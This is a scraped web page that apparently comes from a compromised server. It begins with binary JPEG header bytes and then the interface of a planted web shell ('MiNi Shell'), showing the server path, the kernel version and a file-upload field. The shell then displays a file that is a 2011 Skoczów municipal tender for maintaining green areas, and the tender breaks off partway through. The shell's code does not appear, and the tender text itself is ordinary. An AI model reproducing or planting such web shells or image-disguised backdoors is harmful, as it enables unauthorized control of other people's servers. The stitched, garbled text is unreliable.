JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/120729-N-2011.html

<p class="kh_header"><b>Skoczów: WYKONANIE USŁUGI KOMPLEKSOWEGO UTRZYMANIA TERENÓW ZIELENIE MIEJSKIEJ NA TERENIE GMINY SKOCZÓW</b><br>
<b>Numer ogłoszenia: 120729 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Skoczowa , ul. Rynek 1, 43-430 Skoczów, woj. śląskie, tel. 33 853 29 74, faks 33 853 29 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.skoczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE USŁUGI KOMPLEKSOWEGO UTRZYMANIA TERENÓW ZIELENIE MIEJSKIEJ NA TERENIE GMINY SKOCZÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi kompleksowego utrzymania terenów zieleni miejskiej na terenie Gminy Skoczów.
Wykaz terenów objętych zamówieniem przedstawiono w załączniku nr 7 do specyfikacji. 

Zamówienie obejmuje wszystkie roboty w zakresie utrzymania zieleni miejskiej, a w szczególności: 
a)sadzenie kwiatów, krzewów i drzew, wraz z przygotowaniem podłoża i dostarczeniem niezbędnego materiału, 
b)pielęgnacje obsady, w tym podlewanie w celu prawidłowego wzrostu roślin,
c)całoroczną pielęgnację  i utrzymywanie rabat, gazonów, donic i skupin,  
d)całoroczną pielęgnację trawników, w tym ich koszenie, 
e)tworzenie nowych trawników,
f)całoroczną pielęgnację żywopłotów, drzew, krzewów i róż,
g)prace porządkowe (wiosenne i jesienne grabienie) terenów zielonych,
h)wycinkę drzew i krzewów,
i)zagospodarowanie odpadów powstałych podczas prowadzenia tych prac.

Wykonawca zobowiązany jest do kompleksowego wykonania usługi utrzymania terenów zieleni miejskiej na terenie Gminy Skoczów, łącznie z dostawą materiałów oraz zagospodarowaniem odpadów powstałych podczas prowadzenia prac (liści, trawy, gałęzi itp.) w sposób zgodny z przepisami. Zagospodarowanie odpadów winno być potwierdzone kartą przekazania odpadu, podpisaną przez Wykonawcę i odbiorcę.

Szczegółowy rodzaj prac oraz PRZEWIDYWANA ich wielkość w trakcie trwania umowy:
Odpowiednio: Lp., Nazwa robót, Jednostka, przewidywana ilość:
1-Wiosenne grabienie trawników, skarp i terenów nierównych, wraz z zagospodarowaniem powstałych odpadów- 100m2 - 2107,93; 
2-Wiosenne grabienie skupin, wraz z zagospodarowaniem powstałych odpadów -100m2 - 27,50; 
3-Gracowanie ścieżek parkowych (utwardzonych porfirem)- 100m2-606,80; 
4- Jesienne grabienie trawników, skarp, terenów nierównych oraz usuwaniem liści z chodników, wraz z zagospodarowaniem powstałych odpadów-100m2-3161,90; 
5- Jesienne grabienie skupin, wraz z zagospodarowaniem powstałych odpadów-100m2-41,23; 
6-I Obsada gazonów, rabat, donic bratkami (kolorystyka w uzgodnieniu z zamawiającym) w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału-m2-450; 
7- II obsada gazonów, rabat, donic aksamitką ( w trzech kolorach odmian niska i średnia), a (kolorystyka uzgodniona z zamawiającym) w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału-m2-250; 
8-II obsada gazonów, rabat, donic begonią semperflorens (boby),            w trzech kolorach kwiatów i dwóch kolorach liści (kolorystyka uzgodniona z zamawiającym), w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału -m2-180;
9- II obsada gazonów, rabat, donic starzec popielny (kolorystyka uzgodniona z zamawiającym) w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału-m2-30;
10- II obsada gazonów, rabat, donic żeniszek (kolorystyka uzgodniona z zamawiającym) w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału-m2-50;
11-II obsada gazonów, rabat, donic szałwia (kolorystyka uzgodniona z zamawiającym) w zagęszczeniu 25-30 szt./1m2, wraz z likwidacją obsady, przeryciem gleby, przygotowaniem gleby, nawożeniem, oraz z zakupem i dostarczeniem materiału-m2-50;
12-Obsada gazonów, rabat, donic bez przygotowania gleby (uzupełnienie po kradzieżach, zniszczeniach), wraz z zakupem i dostarczeniem materiałów:  a/ bratek-szt.-150, b/ aksamitka-szt.-150, c/ begonia semperflores (boby)-szt.-100, d/ starzec popielny-szt.-50, e/ żeniszek-szt.-50, f/ szałwia-szt.-50;
13-Obsada donicy o średnicy 20 - 22 cm pelargoniami wiatroodpornymi  w ilości  3 sztuk (przeznaczonych na latarnie na Rynek), wraz z przygotowaniem podłoża oraz zakupem i dostarczeniem materiału + umieszczenie ich na latarniach , bez zakupu donicy- szt. (donica)- 108;
14-Obsada donicy o średnicy 20 - 22 cm pelargoniami wiatroodpornymi w ilości 3 sztuk (przeznaczonych na latarnie na Rynek), wraz z przygotowaniem podłoża oraz zakupem i dostarczeniem materiału + umieszczenie ich na latarniach, z zakupem donicy- szt. donica-20;
15- Obsada 1 stojaka (o pełnym obwodzie) pelargoniami wiatroodpronymi. w ilości 110 sadzonek na jeden stojak wraz z przygotowaniem podłoża oraz zakupem i dostarczeniem materiału-1 stojak-15;
16-Obsada 1 stojaka (połówkowego) pelargoniami wiatroodpornymi ilości 60 sztuk  na stojak wraz z przygotowaniem podłoża oraz zakupem i dostarczeniem materiału-1 stojak-6;
17- Obsada donic i stojaków bez przygotowania podłoża (uzupełnienia po kradzieżach, zniszczeniach), wraz z zakupem i dostarczeniem materiałów: a/ Pelargonie wiatroodporne do donic-szt.-100, b/ Pelargonie wiatroodprone do stojaków-szt.-120;
18- Podlewanie gazonów, donic i rabat + nawożenie dolistne nie rzadziej nie 2 x w miesiącu- (wodę zapewnia zamawiający)-m2-6000;
19- Podlewanie donic z drabiny na lampach na wysokości do 3 m + nawożenie dolistne nie rzadziej niż 1 x w tygodniu-(wodę zapewnia zamawiający)- szt. (donica)- 8000;
20- Podlewanie 1 stojaka (o którym mowa w pkt 15) + nawożenie dolistne nie rzadziej niż 1 x w tygodniu- (wodę zapewnia zamawiający)-szt. (stojak)- 200;
21- Podlewanie 1 stojaka połówkowego (o którym mowa w pkt 16) + nawożenie dolistne nie rzadziej niż 1 x w tygodniu- (wodę zapewnia zamawiający)- szt. (stojak)- 150;
22- Pielęgnacja gazonów, rabat, donic (przekopanie napowietrzające i odchwaszczenie) wraz z zagospodarowaniem powstałych odpadów (chwastów)-m2-1935;  
23- Pielęgnacja róż wraz z zagospodarowaniem powstałych odpadów chwastów: a/ Wiosenne rozkopcowanie-m2-238, b/ Przekopywanie i odchwaszczanie-m2-714, c/ Obcięcie po przekwitnięciu i zakopcowanie-m2-357;
24-Odchwaszczanie Skupin i żywopłotów wraz z zagospodarowaniem powstałych odpadów (chwastów)-10m2-4962,2;
25- Mechaniczne koszenie trawników + grabienie skoszonej trawy w tym uprzątnięcie skoszonej trawy z chodników i ścieżek +   zagospodarowanie skoszonej trawy-100m2-12843,10;
26- Mechaniczne koszenie skarp i terenów nierównych+grabienie skoszonej trawy w tym uprzątnięcie skoszonej trawy z chodników i ścieżek+zagospodarowanie skoszonej trawy-100m2-5106,95;
27-Obcinanie żywopłotów lub krzewów form wolnostojących + zagospodarowanie obciętych pędów, gałęzi-10m2-4137,4;	
28-Ścinanie drzew bez użycia zwyżki o średnicy pnia do 16 cm-szt.-8;
29-Ścinanie drzew bez użycia zwyżki o średnicy pnia 16-20 cm-szt.-8;
30-Ścinanie drzew bez użycia zwyżki o średnicy pnia 21-30 cm-szt.-8;
31-Ścinanie drzew bez użycia zwyżki o średnicy pnia 31-40 cm-szt.-8;
32-Ścinanie drzew bez użycia zwyżki o średnicy pnia 41- 65 cm-szt.-8;
33-Ścinanie drzew bez użycia zwyżki:Dodatek za każde dalsze 5 cm średnicy pnia-szt.-10;
34-Ścinanie drzew z użyciem zwyżki o średnicy pnia do 16 cm-szt.-10;
35-Ścinanie drzew z użyciem zwyżki o średnicy pnia 16 -20-szt.-10;
36-Ścinanie drzew z użyciem zwyżki o średnicy pnia 21-30 cm-szt.-10;
37-Ścinanie drzew z użyciem zwyżki o średnicy pnia 31-40 cm-szt.-10;
38-Ścinanie drzew z użyciem zwyżki o średnicy pnia 41-65 cm-szt.-10;
39-Ścinanie drzew z użyciem zwyżki:Dodatek za każde dalsze 5 cm średnicy pnia-szt.-10;
40-Wysiew nawozów mineralnych i wapna na trawnikach i skupinach, wraz z dostarczeniem materiału-10m2-20;
41-Rozścielanie kory z przerzutem wraz z dostarczeniem materiału-m3-50;
42-Rozścielanie kory z transportem taczkami, wraz z dostarczeniem materiału-m3-50;
43-Rozścielanie ziemi urodzajnej z przerzutem wraz z dostarczeniem materiału-m3-50;
44-Rozścielanie ziemi urodzajnej z transportem taczkami, wraz z dostarczeniem materiału-m3-50;
45-Rozścielanie ziemi urodzajne bez  dostarczenia materiału-m3-50;
46-Palikowanie drzew z przywiązaniem, wraz z dostarczeniem materiału-szt. palika-600;
47-Opryskiwanie środkiem chwastobójczym (nawożenie dolistne, przeciwko szkodnikom itp.), przygotowanie cieczy roboczej i transport pomiędzy terenami oprysku, wraz z dostarczeniem materiału-10l cieczy roboczej-100;
48-Karczowanie krzewów o średnicy korony do 1 m+zagospodarowanie korzeni i pędów-szt.-150;
49-Karczowanie krzewów o średnicy korony powyżej 1 m+ zagospodarowanie korzeni i pędów-szt.-50;
50-Odmładzanie drzew o średnicy pnia do 10 cm-szt.-25;
51-Odmładzanie drzew o średnicy pnia od 11 - 20 cm, bez użycia zwyżki-szt.-30;
52-Odmładzanie drzew o średnicy pnia od 21 - 30 cm, bez użycia zwyżki-szt.-30;
53-Odmładzanie drzew o średnicy pnia 31 - 40 cm, bez użycia zwyżki-szt.-30;
54-Odmładzanie drzew, bez użycia zwyżki: za każde 5 cm średnicy drzewa-szt.-30;
55-Odmładzanie drzew o średnicy pnia od 11 - 20 cm, z użyciem zwyżki-szt.-30;
56-Odmładzanie drzew o średnicy pnia od 21 - 30 cm, z użyciem zwyżki-szt.-30;
57-Odmładzanie drzew o średnicy pnia od 31 - 40 cm, z użyciem zwyżki-szt.-30;
58-Odmładzanie drzew, z użyciem zwyżki: za każde 5 cm średnicy drzewa-szt.-30;
59-Odmładzanie żywopłotów twardych + zagospodarowanie gałęzi i pędów-10m2-700;
60-Zagospodarowanie odpadów - gałęzi - o średnicy poniżej 5 cm z wycinki i przycinki drzew i krzewów - przy zastosowaniu przelicznika 1mp/m3  x 0,25-1 m3-300;
61-Wykonanie trawników z nawożeniem (2kg nawozu/100m2 + 2,5 kg nasion) bez względu na kategorię gruntu. Prace obejmują rozplantowanie ziemi, wyrównanie terenu, wygrabienie kamieni, wysiew nasion i nawozów, zawalcowanie po wysiewie oraz ponowne zawalcowanie przed pierwszym koszeniem, wraz z dostarczeniem materiału-100 m2-5;
62-Sadzenie żywopłotów z zaprawą dołów bez względu na kategorię gruntu-10 szt.-80;
63-Sadzenie drzew liściastych  z zaprawą dołów - drzewa o objętości bryły korzeniowej do 20 l-szt.-60;
64-Sadzenie drzew iglastych z zaprawą dołów - drzewa o objętości bryły korzeniowej do 20 l-szt.-60;
65-Sadzenie krzewów liściastych z zaprawa dołów-szt.-200;
66-Sadzenie krzewów iglastych z zaprawa dołów-szt.-200;
67-Sadzenie róży lub rośliny okrywowej w dole o średnicy do 20 cm-szt.-150;
67-Sadzenie róży lub rośliny okrywowej w dole o średnicy do 20 cm-szt.-150;
68-Sadzenie innych kwiatów jednorocznych np. kana, chlorofitum-szt.-200;
69-Wysokość narzutów do kosztów zakupu i transportu materiałów ( dotyczy pkt 62-68 i materiałów niezbędnych do wykonania innych prac zleconych przez Zamawiającego w zakresie utrzymania zieleni miejskiej)-%;
70-Wartość 1 r-g brutto ( z narzutami) do wyceny prac nie występujących w powyższych pozycjach, a uzgodnionych z Zamawiającym-1 r-g-500.



Wykaz prac na poszczególnych terenach w raz z planowaną krotnością ich wykonania w ciągu roku wegetacyjnego przedstawiono w załączniku nr 9 do specyfikacji.

Przedmiot zamówienia obejmuje również tworzenie nowych terenów zielonych, po zleceniu przez Zamawiającego. Podstawą zlecenia będzie wstępny kosztorys przedmiotowych prac, sporządzony przez Wykonawcę i uzgodniony z Zamawiającym.
Zamawiający nie zamierza zawierać umowy ramowej. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.21.00-1, 77.31.30.00-7, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą się ubiegać wykonawcy którzy udokumentują wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
co najmniej jednej usługi związanej z kompleksowym utrzymaniem terenów zieleni obejmującej: 
-sadzenie kwiatów, krzewów i drzew, wraz z przygotowaniem podłoża i dostarczeniem niezbędnego materiału, 
-pielęgnację  i utrzymywanie rabat, gazonów, donic i skupin, 
-pielęgnację trawników, w tym ich koszenie, 
-pielęgnację żywopłotów, drzew, krzewów i róż, 
-prace porządkowe,
-wycinkę drzew i krzewów 
o wartości min. 200 tys. zł brutto.
Na potwierdzenie spełniania niniejszego warunku Wykonawca zobowiązany jest złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (sporządzonywg załącznika nr 2 do specyfikacji) oraz załączyć dokument potwierdzający że te usługi zostały wykonane lub są wykonywane należycie.
Ocena spełnienia powyższego warunku zostanie dokonana, zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą się ubiegać wykonawcy którzy dysponują lub będą dysponowali co najmniej dwoma osobami przeszkolonymi w zakresie pielęgnacji terenów zielonych i chirurgii drzew.

Na potwierdzenie spełniania niniejszego warunku Wykonawca zobowiązany jest złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania tymi osobami (sporządzony  wg załącznika nr 5 do specyfikacji).
Ocena spełnienia powyższego warunku zostanie dokonana, zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załącznika nr 1 do siwz),
2) zaświadczenie o wpisie do ewidencji działalności gospodarczej celem identyfikacji osób upoważnionych do składania oświadczeń woli w imieniu Wykonawcy, w przypadku osób fizycznych ubiegających się o udzielenie zamówienia,
3) pełnomocnictwo (jeśli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian przedmiotu lub terminu umowy w następującym zakresie:
a) w przypadku wystąpienia usług dodatkowych w trybie art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, 
